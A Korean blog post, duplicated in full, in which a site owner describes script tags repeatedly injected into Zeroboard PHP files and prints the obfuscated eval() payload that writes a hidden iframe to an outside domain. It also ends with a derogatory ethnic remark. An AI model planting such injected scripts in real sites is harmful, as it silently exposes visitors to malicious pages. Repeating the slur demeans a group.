홈페이지 하나를 운영하면서 사람들은 잘 모르는 전투를 치열하게 치루고 있습니다.
하도 답답하여 이제부터는 날마다 어떻게 싸우는지 일기 형식으로 공개를 하겠습니다.
그것은 바로 불법 해킹 광고와의 싸움입니다.
다음은 제가 미리네닷컴에 보낸 편지입니다.
1.
누군가가 제로보드의 _head.php을 열고 하단에
[script language="javascript" type="text/javascript" src="icon/view.gif"][ /script]
이런 소스를 심어 놓습니다. 이게 뭔지 궁금하고요.
어떻게 관리자도 아닌데 _head.php을 열고 수정을 할 수 있는지 궁금합니다.
물론 지난 해 12월에 제로보드 lib.php 와 mam...뭐 파일 두개 패치하라고 해서 했습니다.
2.계정 ftp 비밀번호를 바꾸면 관리자모드로 접근하는 것을 막을 수 있을까요?
아니면 제로보드 관리자 비밀번호를 바꿔야 하나요?
이렇게 비밀번호를 바꾸는 것이 효과가 있을지 확신이 안 섭니다.
3.일단 계정 ftp의 비밀번호를 현재 **** 에서 *****로 바꾸어 주십시오.
도메인은 cyw.pe.kr 입니다.
ftp 비밀번호를 해킹해 접속하는 것이라면 ftp 비밀번호를 바꾸면 접속을 못할 것이다.
미리네닷컴에서 ftp 비밀번호를 바꾸어 주었습니다.
그런데 하룻밤 자고 났더니 홈페이지가 무거워져 있었습니다.
점검해 보았더니 새벽 4:10분에 또 _head.php 하단에
[script language="javascript" type="text/javascript" src="icon/view.gif"][/script]
을 심어 놓았네요. 이런 개....
그렇다면 ftp로 들어오는 것이 아닌것 같습니다.
일단 불법 파일 세개를 찾아 지우고 이번에는 제로보드의 관리자 암호를 바꾸어 보기로 하였습니다.
홈페이지 계정에 접근하는 방법은 ftp와 제로보드 관리자 모드이니 두가지 암호를 바꾸면...
수요일이라 수요에배를 드리고 왔더니 또 홈페이지가 느려져 있었습니다.
확인해 보니 lil.php 하단에
[script language="javascript" type="text/javascript" src="http://420.or.kr/css.js"][/script]
을 심어 놓았네요. 이런 개....
이것으로서 제로보드 암호를 바꾼 것도 소용없다는 것이 확인되었습니다.
도대체 이놈들의 정체는 무엇이며 왜 이렇게 계정에 들락거리며 이상한 것을 심어놓는지 모르겠습니다.
그런데 이번에는 파일 세개를 심어놓은 것이 아니라 한개밖에 안 보이네요.
자세히 봤더니 외부에 링크를 걸었군요.
http://420.or.kr에 링크를 걸었는데 여기가 어디인가??? 접속을 해 보니 장애인단체홈페이지네요.
아니 왜 이런곳이 나온다냐? 자세히 보니 장애인 단체에 광고물이 빡빡하게 깔려 있네요.
아마도 불법 게시물에 css 소스를 올려놓고 링크를 한 것 같습니다. http://420.or.kr/css.js를 누르니
드디어 나왔구나css 파일을 txt 파일로 변환하여 소스를 뒤집어 보니
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('2.3("<1 4=5://6.7.8/9/a.b c=0 d=0>")',14,14,'|iframe|document|write|src|http|www|beijian|com|bbs|check|htm|width|height'.split('|'),0,{}))
오호 드디어 나쁜놈의 시키들이 어디서 오는지 찾았다.
http://www.beijian.com/bbs/check.htm 여기구나
중국놈들이었구나!
아니 그런데 여기가 뭐하는 곳이지?????
하도 답답하여 이제부터는 날마다 어떻게 싸우는지 일기 형식으로 공개를 하겠습니다.
그것은 바로 불법 해킹 광고와의 싸움입니다.
다음은 제가 미리네닷컴에 보낸 편지입니다.
1.
누군가가 제로보드의 _head.php을 열고 하단에
[script language="javascript" type="text/javascript" src="icon/view.gif"][ /script]
이런 소스를 심어 놓습니다. 이게 뭔지 궁금하고요.
어떻게 관리자도 아닌데 _head.php을 열고 수정을 할 수 있는지 궁금합니다.
물론 지난 해 12월에 제로보드 lib.php 와 mam...뭐 파일 두개 패치하라고 해서 했습니다.
2.계정 ftp 비밀번호를 바꾸면 관리자모드로 접근하는 것을 막을 수 있을까요?
아니면 제로보드 관리자 비밀번호를 바꿔야 하나요?
이렇게 비밀번호를 바꾸는 것이 효과가 있을지 확신이 안 섭니다.
3.일단 계정 ftp의 비밀번호를 현재 **** 에서 *****로 바꾸어 주십시오.
도메인은 cyw.pe.kr 입니다.
ftp 비밀번호를 해킹해 접속하는 것이라면 ftp 비밀번호를 바꾸면 접속을 못할 것이다.
미리네닷컴에서 ftp 비밀번호를 바꾸어 주었습니다.
그런데 하룻밤 자고 났더니 홈페이지가 무거워져 있었습니다.
점검해 보았더니 새벽 4:10분에 또 _head.php 하단에
[script language="javascript" type="text/javascript" src="icon/view.gif"][/script]
을 심어 놓았네요. 이런 개....
그렇다면 ftp로 들어오는 것이 아닌것 같습니다.
일단 불법 파일 세개를 찾아 지우고 이번에는 제로보드의 관리자 암호를 바꾸어 보기로 하였습니다.
홈페이지 계정에 접근하는 방법은 ftp와 제로보드 관리자 모드이니 두가지 암호를 바꾸면...
수요일이라 수요에배를 드리고 왔더니 또 홈페이지가 느려져 있었습니다.
확인해 보니 lil.php 하단에
[script language="javascript" type="text/javascript" src="http://420.or.kr/css.js"][/script]
을 심어 놓았네요. 이런 개....
이것으로서 제로보드 암호를 바꾼 것도 소용없다는 것이 확인되었습니다.
도대체 이놈들의 정체는 무엇이며 왜 이렇게 계정에 들락거리며 이상한 것을 심어놓는지 모르겠습니다.
그런데 이번에는 파일 세개를 심어놓은 것이 아니라 한개밖에 안 보이네요.
자세히 봤더니 외부에 링크를 걸었군요.
http://420.or.kr에 링크를 걸었는데 여기가 어디인가??? 접속을 해 보니 장애인단체홈페이지네요.
아니 왜 이런곳이 나온다냐? 자세히 보니 장애인 단체에 광고물이 빡빡하게 깔려 있네요.
아마도 불법 게시물에 css 소스를 올려놓고 링크를 한 것 같습니다. http://420.or.kr/css.js를 누르니
드디어 나왔구나css 파일을 txt 파일로 변환하여 소스를 뒤집어 보니
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('2.3("<1 4=5://6.7.8/9/a.b c=0 d=0>")',14,14,'|iframe|document|write|src|http|www|beijian|com|bbs|check|htm|width|height'.split('|'),0,{}))
오호 드디어 나쁜놈의 시키들이 어디서 오는지 찾았다.
http://www.beijian.com/bbs/check.htm 여기구나
중국놈들이었구나!
아니 그런데 여기가 뭐하는 곳이지?????